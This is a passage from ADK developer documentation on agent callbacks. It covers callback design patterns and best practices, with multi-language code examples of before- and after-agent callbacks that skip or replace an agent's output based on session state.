  - Return a predefined response (`LlmResponse` or `dict`/`Map`) to block the operation
  - Optionally update `context.state` to log the violation

**Example Use Case:** A `before_model_callback` checks `llm_request.contents` for sensitive keywords and returns a standard "Cannot process this request" `LlmResponse` if found, preventing the LLM call.

### 2. Dynamic State Management

**Pattern Overview:** Read from and write to session state within callbacks to make agent behavior context-aware and pass data between steps.
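As a rough illustration of reading and writing state from callbacks, the sketch below uses a hypothetical `TrackedState` class (not an ADK type) that records every write in a `delta` dictionary, loosely mimicking how changes made inside a callback could be collected for later persistence. The callback names, keys, and greeting text are assumptions made for the example.

```python
from typing import Any, Dict


class TrackedState:
    """Hypothetical stand-in for session state that records writes in a delta."""

    def __init__(self, initial: Dict[str, Any]) -> None:
        self._values = dict(initial)
        self.delta: Dict[str, Any] = {}

    def __getitem__(self, key: str) -> Any:
        return self._values[key]

    def get(self, key: str, default: Any = None) -> Any:
        return self._values.get(key, default)

    def __setitem__(self, key: str, value: Any) -> None:
        # Every write is applied and also recorded for later persistence.
        self._values[key] = value
        self.delta[key] = value


def after_tool_save_transaction(state: TrackedState, tool_response: Dict[str, Any]) -> None:
    """Writes one specific key taken from the tool's result."""
    state["last_transaction_id"] = tool_response["transaction_id"]


def before_agent_greeting(state: TrackedState) -> str:
    """Reads a key written earlier to adapt the agent's behavior."""
    tier = state.get("user_tier", "standard")
    return f"Welcome back, {tier} member!"


state = TrackedState({"user_tier": "gold"})
after_tool_save_transaction(state, {"transaction_id": "tx-42"})
print(state.delta)
print(before_agent_greeting(state))
```

Only the key written by the callback appears in `delta`; the pre-existing `user_tier` value is read but not recorded as a change.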
**Implementation:** - Access `callback_context.state` or `tool_context.state` - Modifications (`state['key'] = value`) are automatically tracked in the subsequent `Event.actions.state_delta` - Changes are persisted by the `SessionService` **Example Use Case:** An `after_tool_callback` saves a `transaction_id` from the tool's result to `tool_context.state['last_transaction_id']`. A later `before_agent_callback` might read `state['user_tier']` to customize the agent's greeting. ### 3. Logging and Monitoring **Pattern Overview:** Add detailed logging at specific lifecycle points for observability and debugging. **Implementation:** - Implement callbacks (e.g., `before_agent_callback`, `after_tool_callback`, `after_model_callback`) - Print or send structured logs containing: - Agent name - Tool name - Invocation ID - Relevant data from the context or arguments **Example Use Case:** Log messages like `INFO: [Invocation: e-123] Before Tool: search_api - Args: {'query': 'ADK'}`. ### 4. Caching **Pattern Overview:** Avoid redundant LLM calls or tool executions by caching results. **Implementation Steps:** 1. **Before Operation:** In `before_model_callback` or `before_tool_callback`: - Generate a cache key based on the request/arguments - Check `context.state` (or an external cache) for this key - If found, return the cached `LlmResponse` or result directly 1. **After Operation:** If cache miss occurred: 1. Use the corresponding `after_` callback to store the new result in the cache using the key **Example Use Case:** `before_tool_callback` for `get_stock_price(symbol)` checks `state[f"cache:stock:{symbol}"]`. If present, returns the cached price; otherwise, allows the API call and `after_tool_callback` saves the result to the state key. ### 5. Request/Response Modification **Pattern Overview:** Alter data just before it's sent to the LLM/tool or just after it's received. 
**Implementation Options:** - **`before_model_callback`:** Modify `llm_request` (e.g., add system instructions based on `state`) - **`after_model_callback`:** Modify the returned `LlmResponse` (e.g., format text, filter content) - **`before_tool_callback`:** Modify the tool `args` dictionary (or Map in Java) - **`after_tool_callback`:** Modify the `tool_response` dictionary (or Map in Java) **Example Use Case:** `before_model_callback` appends "User language preference: Spanish" to `llm_request.config.system_instruction` if `context.state['lang'] == 'es'`. ### 6. Conditional Skipping of Steps **Pattern Overview:** Prevent standard operations (agent run, LLM call, tool execution) based on certain conditions. **Implementation:** - Return a value from a `before_` callback to skip the normal execution: - `Content` from `before_agent_callback` - `LlmResponse` from `before_model_callback` - `dict` from `before_tool_callback` - The framework interprets this returned value as the result for that step **Example Use Case:** `before_tool_callback` checks `tool_context.state['api_quota_exceeded']`. If `True`, it returns `{'error': 'API quota exceeded'}`, preventing the actual tool function from running. ### 7. Tool-Specific Actions (Authentication & Summarization Control) **Pattern Overview:** Handle actions specific to the tool lifecycle, primarily authentication and controlling LLM summarization of tool results. **Implementation:** Use `ToolContext` within tool callbacks (`before_tool_callback`, `after_tool_callback`): - **Authentication:** Call `tool_context.request_credential(auth_config)` in `before_tool_callback` if credentials are required but not found (e.g., via `tool_context.get_auth_response` or state check). This initiates the auth flow. - **Summarization:** Set `tool_context.actions.skip_summarization = True` if the raw dictionary output of the tool should be passed back to the LLM or potentially displayed directly, bypassing the default LLM summarization step. 
**Example Use Case:** A `before_tool_callback` for a secure API checks for an auth token in state; if missing, it calls `request_credential`. An `after_tool_callback` for a tool returning structured JSON might set `skip_summarization = True`. ### 8. Artifact Handling **Pattern Overview:** Save or load session-related files or large data blobs during the agent lifecycle. **Implementation:** - **Saving:** Use `callback_context.save_artifact` / `await tool_context.save_artifact` to store data: - Generated reports - Logs - Intermediate data - **Loading:** Use `load_artifact` to retrieve previously stored artifacts - **Tracking:** Changes are tracked via `Event.actions.artifact_delta` **Example Use Case:** An `after_tool_callback` for a "generate_report" tool saves the output file using `await tool_context.save_artifact("report.pdf", report_part)`. A `before_agent_callback` might load a configuration artifact using `callback_context.load_artifact("agent_config.json")`. ## Best Practices for Callbacks ### Design Principles **Keep Focused:** Design each callback for a single, well-defined purpose (e.g., just logging, just validation). Avoid monolithic callbacks. **Mind Performance:** Callbacks execute synchronously within the agent's processing loop. Avoid long-running or blocking operations (network calls, heavy computation). Offload if necessary, but be aware this adds complexity. 
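One way to keep callbacks focused is to write several small functions and combine them. The sketch below is framework-free: `chain_callbacks` is a hypothetical helper rather than an ADK API, and plain dictionaries stand in for the context and request objects. It runs each callback in order and stops at the first one that returns a non-`None` value, which matches the override convention used throughout this guide.

```python
from typing import Any, Callable, Dict, Optional

Callback = Callable[[Dict[str, Any], Dict[str, Any]], Optional[Dict[str, Any]]]


def chain_callbacks(*callbacks: Callback) -> Callback:
    """Combine single-purpose callbacks; the first non-None result wins."""

    def combined(context: Dict[str, Any], request: Dict[str, Any]) -> Optional[Dict[str, Any]]:
        for callback in callbacks:
            result = callback(context, request)
            if result is not None:
                return result
        return None

    return combined


def log_request(context: Dict[str, Any], request: Dict[str, Any]) -> None:
    """Logging only: records the request and never overrides."""
    context.setdefault("log", []).append(f"request: {request['text']}")
    return None


def reject_empty(context: Dict[str, Any], request: Dict[str, Any]) -> Optional[Dict[str, Any]]:
    """Validation only: overrides when the request text is blank."""
    if not request["text"].strip():
        return {"error": "empty request"}
    return None


guard = chain_callbacks(log_request, reject_empty)
context: Dict[str, Any] = {}
print(guard(context, {"text": "hi"}))
print(guard(context, {"text": "  "}))
```

Each function stays small enough to unit test on its own, and the order passed to `chain_callbacks` makes the precedence explicit.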
### Error Handling

**Handle Errors Gracefully:**

- Use `try...except/catch` blocks within your callback functions
- Log errors appropriately
- Decide if the agent invocation should halt or attempt recovery
- Don't let callback errors crash the entire process

### State Management

**Manage State Carefully:**

- Be deliberate about reading from and writing to `context.state`
- Changes are immediately visible within the *current* invocation and persisted at the end of the event processing
- Use specific state keys rather than modifying broad structures to avoid unintended side effects
- Consider using state prefixes (`State.APP_PREFIX`, `State.USER_PREFIX`, `State.TEMP_PREFIX`) for clarity, especially with persistent `SessionService` implementations

### Reliability

**Consider Idempotency:** If a callback performs actions with external side effects (e.g., incrementing an external counter), design it to be idempotent (safe to run multiple times with the same input) if possible, to handle potential retries in the framework or your application.

### Testing & Documentation

**Test Thoroughly:**

- Unit test your callback functions using mock context objects
- Perform integration tests to ensure callbacks function correctly within the full agent flow

**Ensure Clarity:**

- Use descriptive names for your callback functions
- Add clear docstrings explaining their purpose, when they run, and any side effects (especially state modifications)

**Use Correct Context Type:** Always use the specific context type provided (`CallbackContext` for agent/model, `ToolContext` for tools) to ensure access to the appropriate methods and properties.

By applying these patterns and best practices, you can effectively use callbacks to create more robust, observable, and customized agent behaviors in ADK.

# Types of Callbacks

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

The framework provides different types of callbacks that trigger at various stages of an agent's execution.
Understanding when each callback fires and what context it receives is key to using them effectively. ## Agent Lifecycle Callbacks These callbacks are available on *any* agent that inherits from `BaseAgent` (including `LlmAgent`, `SequentialAgent`, `ParallelAgent`, `LoopAgent`, etc). Note The specific method names or return types may vary slightly by SDK language (e.g., return `None` in Python, return `Optional.empty()` or `Maybe.empty()` in Java). Refer to the language-specific API documentation for details. ### Before Agent Callback **When:** Called *immediately before* the agent's `_run_async_impl` (or `_run_live_impl`) method is executed. It runs after the agent's `InvocationContext` is created but *before* its core logic begins. **Purpose:** Ideal for setting up resources or state needed only for this specific agent's run, performing validation checks on the session state (callback_context.state) before execution starts, logging the entry point of the agent's activity, or potentially modifying the invocation context before the core logic uses it. Code ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # --- Setup Instructions --- # # 1. Install the ADK package: # !pip install google-adk # # Make sure to restart kernel if using colab/jupyter notebooks # # 2. 
Set up your Gemini API Key: # # - Get a key from Google AI Studio: https://aistudio.google.com/app/apikey # # - Set it as an environment variable: # import os # os.environ["GOOGLE_API_KEY"] = "YOUR_API_KEY_HERE" # <--- REPLACE with your actual key # # Or learn about other authentication methods (like Vertex AI): # # https://google.github.io/adk-docs/agents/models/ # ADK Imports from google.adk.agents import LlmAgent from google.adk.agents.callback_context import CallbackContext from google.adk.runners import InMemoryRunner # Use InMemoryRunner from google.genai import types # For types.Content from typing import Optional # Define the model - Use the specific model name requested GEMINI_2_FLASH="gemini-2.0-flash" # --- 1. Define the Callback Function --- def check_if_agent_should_run(callback_context: CallbackContext) -> Optional[types.Content]: """ Logs entry and checks 'skip_llm_agent' in session state. If True, returns Content to skip the agent's execution. If False or not present, returns None to allow execution. """ agent_name = callback_context.agent_name invocation_id = callback_context.invocation_id current_state = callback_context.state.to_dict() print(f"\n[Callback] Entering agent: {agent_name} (Inv: {invocation_id})") print(f"[Callback] Current State: {current_state}") # Check the condition in session state dictionary if current_state.get("skip_llm_agent", False): print(f"[Callback] State condition 'skip_llm_agent=True' met: Skipping agent {agent_name}.") # Return Content to skip the agent's run return types.Content( parts=[types.Part(text=f"Agent {agent_name} skipped by before_agent_callback due to state.")], role="model" # Assign model role to the overriding response ) else: print(f"[Callback] State condition not met: Proceeding with agent {agent_name}.") # Return None to allow the LlmAgent's normal execution return None # --- 2. 
# Setup Agent with Callback ---
llm_agent_with_before_cb = LlmAgent(
    name="MyControlledAgent",
    model=GEMINI_2_FLASH,
    instruction="You are a concise assistant.",
    description="An LLM agent demonstrating stateful before_agent_callback",
    before_agent_callback=check_if_agent_should_run # Assign the callback
)

# --- 3. Setup Runner and Sessions using InMemoryRunner ---
async def main():
    app_name = "before_agent_demo"
    user_id = "test_user"
    session_id_run = "session_will_run"
    session_id_skip = "session_will_skip"

    # Use InMemoryRunner - it includes InMemorySessionService
    runner = InMemoryRunner(agent=llm_agent_with_before_cb, app_name=app_name)
    # Get the bundled session service to create sessions
    session_service = runner.session_service

    # Create session 1: Agent will run (default empty state)
    # create_session is awaited here, consistent with the guardrail example earlier in this guide
    await session_service.create_session(
        app_name=app_name,
        user_id=user_id,
        session_id=session_id_run
        # No initial state means 'skip_llm_agent' will be False in the callback check
    )

    # Create session 2: Agent will be skipped (state has skip_llm_agent=True)
    await session_service.create_session(
        app_name=app_name,
        user_id=user_id,
        session_id=session_id_skip,
        state={"skip_llm_agent": True} # Set the state flag here
    )

    # --- Scenario 1: Run where callback allows agent execution ---
    print("\n" + "="*20 + f" SCENARIO 1: Running Agent on Session '{session_id_run}' (Should Proceed) " + "="*20)
    async for event in runner.run_async(
        user_id=user_id,
        session_id=session_id_run,
        new_message=types.Content(role="user", parts=[types.Part(text="Hello, please respond.")])
    ):
        # Print final output (either from LLM or callback override)
        if event.is_final_response() and event.content:
            print(f"Final Output: [{event.author}] {event.content.parts[0].text.strip()}")
        elif event.is_error():
            print(f"Error Event: {event.error_details}")

    # --- Scenario 2: Run where callback intercepts and skips agent ---
    print("\n" + "="*20 + f" SCENARIO 2: Running Agent on Session '{session_id_skip}' (Should Skip) " + "="*20)
    async for event in
runner.run_async( user_id=user_id, session_id=session_id_skip, new_message=types.Content(role="user", parts=[types.Part(text="This message won't reach the LLM.")]) ): # Print final output (either from LLM or callback override) if event.is_final_response() and event.content: print(f"Final Output: [{event.author}] {event.content.parts[0].text.strip()}") elif event.is_error(): print(f"Error Event: {event.error_details}") # --- 4. Execute --- # In a Python script: # import asyncio # if __name__ == "__main__": # # Make sure GOOGLE_API_KEY environment variable is set if not using Vertex AI auth # # Or ensure Application Default Credentials (ADC) are configured for Vertex AI # asyncio.run(main()) # In a Jupyter Notebook or similar environment: await main() ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, InMemoryRunner, CallbackContext, isFinalResponse, } from "@google/adk"; import { Content, createUserContent } from "@google/genai"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "before_agent_callback_app"; const USER_ID = "test_user_before_agent"; const SESSION_ID_RUN = "session_will_run"; const SESSION_ID_SKIP = "session_will_skip"; // --- 1. Define the Callback Function --- function checkIfAgentShouldRun( callbackContext: CallbackContext ): Content | undefined { /** * Logs entry and checks 'skip_llm_agent' in session state. * If True, returns Content to skip the agent's execution. 
* If False or not present, returns undefined to allow execution. */ const agentName = callbackContext.agentName; const invocationId = callbackContext.invocationId; const currentState = callbackContext.state; console.log(`\n[Callback] Entering agent: ${agentName} (Inv: ${invocationId})`); console.log(`[Callback] Current State:`, currentState); // Check the condition in session state if (currentState.get("skip_llm_agent") === true) { console.log( `[Callback] State condition 'skip_llm_agent=True' met: Skipping agent ${agentName}.` ); // Return Content to skip the agent's run return { parts: [ { text: `Agent ${agentName} skipped by before_agent_callback due to state.`, }, ], role: "model", // Assign model role to the overriding response }; } else { console.log( `[Callback] State condition not met: Proceeding with agent ${agentName}.` ); // Return undefined to allow the LlmAgent's normal execution return undefined; } } // --- 2. Setup Agent with Callback --- const llmAgentWithBeforeCb = new LlmAgent({ name: "MyControlledAgent", model: MODEL_NAME, instruction: "You are a concise assistant.", description: "An LLM agent demonstrating stateful before_agent_callback", beforeAgentCallback: checkIfAgentShouldRun, // Assign the callback }); // --- 3. 
Setup Runner and Sessions using InMemoryRunner --- async function main() { // Use InMemoryRunner - it includes InMemorySessionService const runner = new InMemoryRunner({ agent: llmAgentWithBeforeCb, appName: APP_NAME, }); // Create session 1: Agent will run (default empty state) await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_RUN, // No initial state means 'skip_llm_agent' will be False in the callback check }); // Create session 2: Agent will be skipped (state has skip_llm_agent=True) await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_SKIP, state: { skip_llm_agent: true }, // Set the state flag here }); // --- Scenario 1: Run where callback allows agent execution --- console.log( `\n==================== SCENARIO 1: Running Agent on Session "${SESSION_ID_RUN}" (Should Proceed) ====================` ); const eventsRun = runner.runAsync({ userId: USER_ID, sessionId: SESSION_ID_RUN, newMessage: createUserContent("Hello, please respond."), }); for await (const event of eventsRun) { // Print final output (either from LLM or callback override) if (isFinalResponse(event) && event.content?.parts?.length) { const finalResponse = event.content.parts .map((part: any) => part.text ?? 
"") .join(""); console.log( `Final Output: [${event.author}] ${finalResponse.trim()}` ); } else if (event.errorMessage) { console.log(`Error Event: ${event.errorMessage}`); } } // --- Scenario 2: Run where callback intercepts and skips agent --- console.log( `\n==================== SCENARIO 2: Running Agent on Session "${SESSION_ID_SKIP}" (Should Skip) ====================` ); const eventsSkip = runner.runAsync({ userId: USER_ID, sessionId: SESSION_ID_SKIP, newMessage: createUserContent("This message won't reach the LLM."), }); for await (const event of eventsSkip) { // Print final output (either from LLM or callback override) if (isFinalResponse(event) && event.content?.parts?.length) { const finalResponse = event.content.parts .map((part: any) => part.text ?? "") .join(""); console.log( `Final Output: [${event.author}] ${finalResponse.trim()}` ); } else if (event.errorMessage) { console.log(`Error Event: ${event.errorMessage}`); } } } // --- 4. Execute --- main(); ``` ```go package main import ( "context" "fmt" "log" "regexp" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) // 1. Define the Callback Function func onBeforeAgent(ctx agent.CallbackContext) (*genai.Content, error) { agentName := ctx.AgentName() log.Printf("[Callback] Entering agent: %s", agentName) if skip, _ := ctx.State().Get("skip_llm_agent"); skip == true { log.Printf("[Callback] State condition met: Skipping agent %s", agentName) return genai.NewContentFromText( fmt.Sprintf("Agent %s skipped by before_agent_callback.", agentName), genai.RoleModel, ), nil } log.Printf("[Callback] State condition not met: Running agent %s", agentName) return nil, nil } // 2. Define a function to set up and run the agent with the callback. 
func runBeforeAgentExample() { ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("FATAL: Failed to create model: %v", err) } // 3. Register the callback in the agent configuration. llmCfg := llmagent.Config{ Name: "AgentWithBeforeAgentCallback", BeforeAgentCallbacks: []agent.BeforeAgentCallback{onBeforeAgent}, Model: geminiModel, Instruction: "You are a concise assistant.", } testAgent, err := llmagent.New(llmCfg) if err != nil { log.Fatalf("FATAL: Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{AppName: appName, Agent: testAgent, SessionService: sessionService}) if err != nil { log.Fatalf("FATAL: Failed to create runner: %v", err) } // 4. Run scenarios to demonstrate the callback's behavior. log.Println("--- SCENARIO 1: Agent should run normally ---") runScenario(ctx, r, sessionService, appName, "session_normal", nil, "Hello, world!") log.Println("\n--- SCENARIO 2: Agent should be skipped ---") runScenario(ctx, r, sessionService, appName, "session_skip", map[string]any{"skip_llm_agent": true}, "This should be skipped.") } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.BaseAgent; import com.google.adk.agents.CallbackContext; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.adk.sessions.State; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import io.reactivex.rxjava3.core.Maybe; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; public class BeforeAgentCallbackExample { private static final String APP_NAME = "AgentWithBeforeAgentCallback"; private static final String USER_ID = "test_user_456"; private static final String SESSION_ID = "session_id_123"; private static final String MODEL_NAME = "gemini-2.0-flash"; 
public static void main(String[] args) { BeforeAgentCallbackExample callbackAgent = new BeforeAgentCallbackExample(); callbackAgent.defineAgent("Write a document about a cat"); } // --- 1. Define the Callback Function --- /** * Logs entry and checks 'skip_llm_agent' in session state. If True, returns Content to skip the * agent's execution. If False or not present, returns None to allow execution. */ public Maybe checkIfAgentShouldRun(CallbackContext callbackContext) { String agentName = callbackContext.agentName(); String invocationId = callbackContext.invocationId(); State currentState = callbackContext.state(); System.out.printf("%n[Callback] Entering agent: %s (Inv: %s)%n", agentName, invocationId); System.out.printf("[Callback] Current State: %s%n", currentState.entrySet()); // Check the condition in session state dictionary if (Boolean.TRUE.equals(currentState.get("skip_llm_agent"))) { System.out.printf( "[Callback] State condition 'skip_llm_agent=True' met: Skipping agent %s", agentName); // Return Content to skip the agent's run return Maybe.just( Content.fromParts( Part.fromText( String.format( "Agent %s skipped by before_agent_callback due to state.", agentName)))); } System.out.printf( "[Callback] State condition 'skip_llm_agent=True' NOT met: Running agent %s \n", agentName); // Return empty response to allow the LlmAgent's normal execution return Maybe.empty(); } public void defineAgent(String prompt) { // --- 2. Setup Agent with Callback --- BaseAgent llmAgentWithBeforeCallback = LlmAgent.builder() .model(MODEL_NAME) .name(APP_NAME) .instruction("You are a concise assistant.") .description("An LLM agent demonstrating stateful before_agent_callback") // You can also use a sync version of this callback "beforeAgentCallbackSync" .beforeAgentCallback(this::checkIfAgentShouldRun) .build(); // --- 3. 
Setup Runner and Sessions using InMemoryRunner --- // Use InMemoryRunner - it includes InMemorySessionService InMemoryRunner runner = new InMemoryRunner(llmAgentWithBeforeCallback, APP_NAME); // Scenario 1: Initial state is null, which means 'skip_llm_agent' will be false in the callback // check runAgent(runner, null, prompt); // Scenario 2: Agent will be skipped (state has skip_llm_agent=true) runAgent(runner, new ConcurrentHashMap<>(Map.of("skip_llm_agent", true)), prompt); } public void runAgent(InMemoryRunner runner, ConcurrentHashMap<String, Object> initialState, String prompt) { // InMemoryRunner automatically creates a session service. Create a session using the service. Session session = runner .sessionService() .createSession(APP_NAME, USER_ID, initialState, SESSION_ID) .blockingGet(); Content userMessage = Content.fromParts(Part.fromText(prompt)); // Run the agent Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage); // Print final output (either from LLM or callback override) eventStream.blockingForEach( event -> { if (event.finalResponse()) { System.out.println(event.stringifyContent()); } }); } } ``` **Note on the `before_agent_callback` Example:** - **What it Shows:** This example demonstrates the `before_agent_callback`. This callback runs *right before* the agent's main processing logic starts for a given request. - **How it Works:** The callback function (`check_if_agent_should_run`) looks at a flag (`skip_llm_agent`) in the session's state. - If the flag is `True`, the callback returns a `types.Content` object. This tells the ADK framework to **skip** the agent's main execution entirely and use the callback's returned content as the final response. - If the flag is `False` (or not set), the callback returns `None` or an empty object. This tells the ADK framework to **proceed** with the agent's normal execution (calling the LLM in this case). - **Expected Outcome:** You'll see two scenarios: 1. 
In the session *with* the `skip_llm_agent: True` state, the agent's LLM call is bypassed, and the output comes directly from the callback ("Agent... skipped..."). 1. In the session *without* that state flag, the callback allows the agent to run, and you see the actual response from the LLM (e.g., "Hello!"). - **Understanding Callbacks:** This highlights how `before_` callbacks act as **gatekeepers**, allowing you to intercept execution *before* a major step and potentially prevent it based on checks (like state, input validation, permissions). ### After Agent Callback **When:** Called *immediately after* the agent's `_run_async_impl` (or `_run_live_impl`) method successfully completes. It does *not* run if the agent was skipped due to `before_agent_callback` returning content or if `end_invocation` was set during the agent's run. **Purpose:** Useful for cleanup tasks, post-execution validation, logging the completion of an agent's activity, modifying final state, or augmenting the agent's final output. Code ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # --- Setup Instructions --- # # 1. Install the ADK package: # !pip install google-adk # # Make sure to restart kernel if using colab/jupyter notebooks # # 2. 
Set up your Gemini API Key: # # - Get a key from Google AI Studio: https://aistudio.google.com/app/apikey # # - Set it as an environment variable: # import os # os.environ["GOOGLE_API_KEY"] = "YOUR_API_KEY_HERE" # <--- REPLACE with your actual key # # Or learn about other authentication methods (like Vertex AI): # # https://google.github.io/adk-docs/agents/models/ # ADK Imports from google.adk.agents import LlmAgent from google.adk.agents.callback_context import CallbackContext from google.adk.runners import InMemoryRunner # Use InMemoryRunner from google.genai import types # For types.Content from typing import Optional # Define the model - Use the specific model name requested GEMINI_2_FLASH="gemini-2.0-flash" # --- 1. Define the Callback Function --- def modify_output_after_agent(callback_context: CallbackContext) -> Optional[types.Content]: """ Logs exit from an agent and checks 'add_concluding_note' in session state. If True, returns new Content to *replace* the agent's original output. If False or not present, returns None, allowing the agent's original output to be used. 
""" agent_name = callback_context.agent_name invocation_id = callback_context.invocation_id current_state = callback_context.state.to_dict() print(f"\n[Callback] Exiting agent: {agent_name} (Inv: {invocation_id})") print(f"[Callback] Current State: {current_state}") # Example: Check state to decide whether to modify the final output if current_state.get("add_concluding_note", False): print(f"[Callback] State condition 'add_concluding_note=True' met: Replacing agent {agent_name}'s output.") # Return Content to *replace* the agent's own output return types.Content( parts=[types.Part(text=f"Concluding note added by after_agent_callback, replacing original output.")], role="model" # Assign model role to the overriding response ) else: print(f"[Callback] State condition not met: Using agent {agent_name}'s original output.") # Return None - the agent's output produced just before this callback will be used. return None # --- 2. Setup Agent with Callback --- llm_agent_with_after_cb = LlmAgent( name="MySimpleAgentWithAfter", model=GEMINI_2_FLASH, instruction="You are a simple agent. Just say 'Processing complete!'", description="An LLM agent demonstrating after_agent_callback for output modification", after_agent_callback=modify_output_after_agent # Assign the callback here ) # --- 3. 
Setup Runner and Sessions using InMemoryRunner --- async def main(): app_name = "after_agent_demo" user_id = "test_user_after" session_id_normal = "session_run_normally" session_id_modify = "session_modify_output" # Use InMemoryRunner - it includes InMemorySessionService runner = InMemoryRunner(agent=llm_agent_with_after_cb, app_name=app_name) # Get the bundled session service to create sessions session_service = runner.session_service # Create session 1: Agent output will be used as is (default empty state) # create_session is a coroutine, so it must be awaited await session_service.create_session( app_name=app_name, user_id=user_id, session_id=session_id_normal # No initial state means 'add_concluding_note' will be False in the callback check ) # print(f"Session '{session_id_normal}' created with default state.") # Create session 2: Agent output will be replaced by the callback await session_service.create_session( app_name=app_name, user_id=user_id, session_id=session_id_modify, state={"add_concluding_note": True} # Set the state flag here ) # print(f"Session '{session_id_modify}' created with state={{'add_concluding_note': True}}.") # --- Scenario 1: Run where callback allows agent's original output --- print("\n" + "="*20 + f" SCENARIO 1: Running Agent on Session '{session_id_normal}' (Should Use Original Output) " + "="*20) async for event in runner.run_async( user_id=user_id, session_id=session_id_normal, new_message=types.Content(role="user", parts=[types.Part(text="Process this please.")]) ): # Print final output (either from LLM or callback override) if event.is_final_response() and event.content: print(f"Final Output: [{event.author}] {event.content.parts[0].text.strip()}") elif event.is_error(): print(f"Error Event: {event.error_details}") # --- Scenario 2: Run where callback replaces the agent's output --- print("\n" + "="*20 + f" SCENARIO 2: Running Agent on Session '{session_id_modify}' (Should Replace Output) " + "="*20) async for event in runner.run_async( user_id=user_id, session_id=session_id_modify, 
new_message=types.Content(role="user", parts=[types.Part(text="Process this and add note.")]) ): # Print final output (either from LLM or callback override) if event.is_final_response() and event.content: print(f"Final Output: [{event.author}] {event.content.parts[0].text.strip()}") elif event.is_error(): print(f"Error Event: {event.error_details}") # --- 4. Execute --- # In a Python script: # import asyncio # if __name__ == "__main__": # # Make sure GOOGLE_API_KEY environment variable is set if not using Vertex AI auth # # Or ensure Application Default Credentials (ADC) are configured for Vertex AI # asyncio.run(main()) # In a Jupyter Notebook or similar environment: await main() ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, CallbackContext, isFinalResponse, InMemoryRunner, } from "@google/adk"; import { createUserContent } from "@google/genai"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "after_agent_callback_app"; const USER_ID = "test_user_after_agent"; const SESSION_NORMAL_ID = "session_run_normally_ts"; const SESSION_MODIFY_ID = "session_modify_output_ts"; // --- 1. Define the Callback Function --- /** * Logs exit from an agent and checks "add_concluding_note" in session state. * If True, returns new Content to *replace* the agent's original output. * If False or not present, returns void, allowing the agent's original output to be used. 
*/ function modifyOutputAfterAgent(context: CallbackContext): any { const agentName = context.agentName; const invocationId = context.invocationId; const currentState = context.state; console.log( ` [Callback] Exiting agent: ${agentName} (Inv: ${invocationId})` ); console.log(`[Callback] Current State:`, currentState); // Example: Check state to decide whether to modify the final output if (currentState.get("add_concluding_note") === true) { console.log( `[Callback] State condition "add_concluding_note=true" met: Replacing agent ${agentName}'s output.` ); // Return Content to *replace* the agent's own output return createUserContent( "Concluding note added by after_agent_callback, replacing original output." ); } else { console.log( `[Callback] State condition not met: Using agent ${agentName}'s original output.` ); // Return void/undefined - the agent's output will be used. return; } } // --- 2. Setup Agent with Callback --- const llmAgentWithAfterCb = new LlmAgent({ name: "MySimpleAgentWithAfter", model: MODEL_NAME, instruction: "You are a simple agent. Just say \"Processing complete!\"", description: "An LLM agent demonstrating after_agent_callback for output modification", afterAgentCallback: modifyOutputAfterAgent, // Assign the callback here }); // --- 3. 
